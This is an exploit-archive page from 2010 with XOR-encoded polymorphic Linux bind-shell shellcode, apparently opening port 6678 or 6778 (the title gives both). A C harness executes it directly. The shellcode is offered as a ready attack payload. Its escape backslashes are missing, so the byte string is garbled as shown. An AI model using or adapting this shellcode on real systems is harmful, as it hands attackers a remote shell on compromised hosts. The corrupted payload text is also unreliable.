[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 125 bind port to 6778 XOR encoded polymorphic linux shellcode .
# Published : 2010-07-05
# Author :
# Previous Title : OSX/Intel reverse_tcp shell x86_64 - 131 bytes
# Next Title : Linux/x86 - netcat bindshell port 6666 - 69 bytes


/*
Title  : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name   : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date   : Tue Jul  6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "xebx11x5ex31xc9xb1x65x80x74x0exff"
		   "x0ax80xe9x01x75xf6xebx05xe8xeaxff"
		   "xffxffx3bxcax3bxd1x3bxd8x5ax60x0b"
		   "x60x08x83xebxf4xc9xbax6cxc7x8ax83"
		   "xccx58x62xb1x08x10x70x83xebx60x1a"
		   "x5bx5cx83xebxf4xc9xbax6cxc7x8ax58"
		   "x5cx83xebxb9x0exbax6cxc7x8ax58x58"
		   "x5cx83xebxf4xc9xbax6cxc7x8ax83xc9"
		   "x3bxc3xbax35xc7x8ax4bxbax35xc7x8a"
		   "x4bxbax35xc7x8ax58x62x25x25x79x62"
		   "x62x25x68x63x64x83xe9x58x59x83xeb"
		   "xbax01xc7x8a";

		
int main(void)
{
	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();
}